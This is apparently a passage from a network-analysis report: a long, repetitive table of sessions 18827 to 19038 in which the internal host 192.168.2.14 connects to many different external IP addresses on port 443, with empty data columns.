                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18827192.168.2.1434630108.11.99.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18828192.168.2.1444458136.185.161.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18829192.168.2.14539724.252.204.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18830192.168.2.143625639.195.136.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18831192.168.2.1452806155.191.216.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18832192.168.2.145444813.120.85.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18833192.168.2.1438318114.119.14.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18834192.168.2.1440042165.188.7.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18835192.168.2.145101444.249.184.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18836192.168.2.1447284168.132.142.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18837192.168.2.143627869.167.245.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18838192.168.2.144669017.181.119.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18839192.168.2.1444592180.214.29.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18840192.168.2.1460250148.33.56.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18841192.168.2.145442898.113.152.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18842192.168.2.1453170199.9.228.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18843192.168.2.14575884.33.215.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18844192.168.2.146078247.28.156.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18845192.168.2.1446808221.15.230.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18846192.168.2.145941617.215.69.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18847192.168.2.1448498157.193.91.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18848192.168.2.1437544218.114.242.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18849192.168.2.1456612223.113.248.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18850192.168.2.1443652106.251.49.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18851192.168.2.1459086137.94.116.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18852192.168.2.1454416206.128.142.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18853192.168.2.1445758144.79.239.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18854192.168.2.1441848125.170.168.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18855192.168.2.1436952211.54.167.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18856192.168.2.143438069.178.88.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18857192.168.2.145890449.44.202.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18858192.168.2.143924249.217.85.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18859192.168.2.1440214164.140.171.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18860192.168.2.1443366153.110.213.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18861192.168.2.146061496.17.143.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18862192.168.2.1446814119.234.162.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18863192.168.2.144689257.17.66.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18864192.168.2.144817887.94.243.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18865192.168.2.1459776106.138.134.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18866192.168.2.143811042.237.152.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18867192.168.2.1439176200.37.224.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18868192.168.2.1442494155.101.120.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18869192.168.2.144687291.177.37.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18870192.168.2.144696412.168.30.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18871192.168.2.145669263.179.10.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18872192.168.2.1441302204.227.79.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18873192.168.2.145988860.62.47.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18874192.168.2.143341882.211.44.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18875192.168.2.14568749.121.233.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18876192.168.2.1441984190.129.128.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18877192.168.2.1445646160.26.76.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18878192.168.2.1460134200.7.173.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18879192.168.2.1453686126.241.113.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18880192.168.2.1438036146.200.6.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18881192.168.2.1452358180.20.102.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18882192.168.2.1445990131.158.157.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18883192.168.2.1434278216.194.104.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18884192.168.2.144818213.118.43.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18885192.168.2.1433216132.16.53.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18886192.168.2.1441284173.161.182.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18887192.168.2.1437758152.36.168.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18888192.168.2.1450890163.128.185.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18889192.168.2.1457578159.243.139.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18890192.168.2.1441144150.246.157.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18891192.168.2.1455782160.21.15.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18892192.168.2.1443904219.207.4.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18893192.168.2.145181266.123.126.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18894192.168.2.1443490164.232.159.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18895192.168.2.1445152174.131.239.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18896192.168.2.1459648131.73.188.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18897192.168.2.145694057.210.123.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18898192.168.2.143623691.132.214.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18899192.168.2.1435878171.244.101.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18900192.168.2.143698281.74.95.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18901192.168.2.1443752184.59.154.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18902192.168.2.144215876.11.167.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18903192.168.2.145111671.111.205.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18904192.168.2.1459562143.236.118.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18905192.168.2.145658465.86.95.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18906192.168.2.1441510194.98.165.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18907192.168.2.1446430141.50.61.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18908192.168.2.145763862.83.91.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18909192.168.2.144417440.215.71.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18910192.168.2.145592851.196.242.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18911192.168.2.145223876.112.108.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18912192.168.2.145613698.195.189.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18913192.168.2.1444564176.134.99.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18914192.168.2.1453322118.183.151.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18915192.168.2.1450930136.200.210.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18916192.168.2.1442810140.114.202.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18917192.168.2.1454420126.185.87.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18918192.168.2.14355102.37.93.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18919192.168.2.1453962192.229.187.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18920192.168.2.1440674110.213.95.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18921192.168.2.143541899.27.128.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18922192.168.2.1445822171.87.151.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18923192.168.2.1451744156.143.205.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18924192.168.2.143496669.171.243.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18925192.168.2.1444990196.65.82.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18926192.168.2.143408493.254.214.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18927192.168.2.1460518219.38.140.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18928192.168.2.1448040201.161.135.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18929192.168.2.1437494223.88.173.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18930192.168.2.1451778103.170.231.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18931192.168.2.144024827.170.121.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18932192.168.2.1453232156.231.59.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18933192.168.2.1447988114.216.199.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18934192.168.2.144139672.54.20.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18935192.168.2.144783636.84.47.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18936192.168.2.143353445.253.204.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18937192.168.2.143678473.77.26.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18938192.168.2.1446992187.12.133.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18939192.168.2.1455214120.133.130.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18940192.168.2.14340641.67.42.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18941192.168.2.143513884.3.104.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18942192.168.2.144607259.214.11.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18943192.168.2.1435328111.2.2.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18944192.168.2.1434212198.67.49.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18945192.168.2.145340238.61.47.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18946192.168.2.14552608.249.162.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18947192.168.2.1452336147.1.99.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18948192.168.2.1452474146.189.152.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18949192.168.2.1451464152.162.178.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18950192.168.2.143701040.176.175.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18951192.168.2.1436070187.33.137.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18952192.168.2.14597248.121.192.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18953192.168.2.144117072.93.207.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18954192.168.2.145127225.108.218.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18955192.168.2.143290425.123.4.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18956192.168.2.14459045.57.41.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18957192.168.2.14406844.60.233.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18958192.168.2.1455710210.170.148.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18959192.168.2.1439618123.153.190.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18960192.168.2.144910694.153.16.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18961192.168.2.1446834114.51.43.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18962192.168.2.1450722111.6.30.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18963192.168.2.1451094177.253.175.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18964192.168.2.145663242.1.222.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18965192.168.2.1451010102.95.126.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18966192.168.2.144297824.188.104.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18967192.168.2.145999054.68.47.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18968192.168.2.146063082.172.42.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18969192.168.2.145330664.101.25.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18970192.168.2.144642699.62.135.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18971192.168.2.144993876.13.165.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18972192.168.2.1451678143.204.32.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18973192.168.2.145181294.218.224.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18974192.168.2.144312697.209.87.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18975192.168.2.1452046222.119.22.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18976192.168.2.1443168195.194.46.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18977192.168.2.1443872102.16.174.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18978192.168.2.1459102171.208.254.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18979192.168.2.145708245.242.79.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18980192.168.2.1435082104.125.77.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18981192.168.2.145980442.10.207.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18982192.168.2.145017049.181.125.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18983192.168.2.1446706208.73.155.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18984192.168.2.1439658152.136.43.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18985192.168.2.1455366102.48.15.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18986192.168.2.1433716153.102.90.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18987192.168.2.1456006194.49.13.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18988192.168.2.1435542212.163.170.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18989192.168.2.1437080169.116.214.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18990192.168.2.146022613.39.46.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18991192.168.2.1434828184.221.202.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18992192.168.2.1447170111.196.209.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18993192.168.2.1449236114.227.47.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18994192.168.2.1435498193.53.140.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18995192.168.2.143902296.223.16.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18996192.168.2.14444244.13.43.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18997192.168.2.145497412.248.46.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18998192.168.2.1438764131.49.17.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18999192.168.2.1453684120.244.215.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19000192.168.2.144715612.78.3.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19001192.168.2.144982066.156.147.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19002192.168.2.145216235.233.174.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19003192.168.2.1442936203.181.227.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19004192.168.2.143876239.237.23.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19005192.168.2.145982483.190.18.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19006192.168.2.145866636.127.11.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19007192.168.2.1442850142.129.194.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19008192.168.2.145749042.79.201.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19009192.168.2.1455950164.198.87.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19010192.168.2.1458776207.189.49.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19011192.168.2.14439722.78.83.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19012192.168.2.145411639.165.115.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19013192.168.2.1449676177.177.173.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19014192.168.2.1444576219.49.95.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19015192.168.2.1447722220.224.4.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19016192.168.2.144754618.73.138.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19017192.168.2.1440498143.78.222.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19018192.168.2.1443492207.227.155.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19019192.168.2.145286614.185.106.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19020192.168.2.143730088.211.151.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19021192.168.2.1435868187.126.140.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19022192.168.2.1439174124.12.168.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19023192.168.2.1459912185.188.17.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19024192.168.2.1455346189.147.32.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19025192.168.2.1453194104.169.172.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19026192.168.2.1438346218.192.51.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19027192.168.2.1442342116.136.148.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19028192.168.2.1445944131.140.92.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19029192.168.2.145906094.101.184.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19030192.168.2.144757451.149.171.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19031192.168.2.143950842.161.162.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19032192.168.2.1446136172.55.238.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19033192.168.2.14572461.76.245.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19034192.168.2.145847823.235.36.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19035192.168.2.1440488125.85.143.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19036192.168.2.1449680139.31.94.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19037192.168.2.1434496185.123.114.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19038192.168.2.143280899.237.239.194443
                                                        TimestampBytes transferredDirectionData


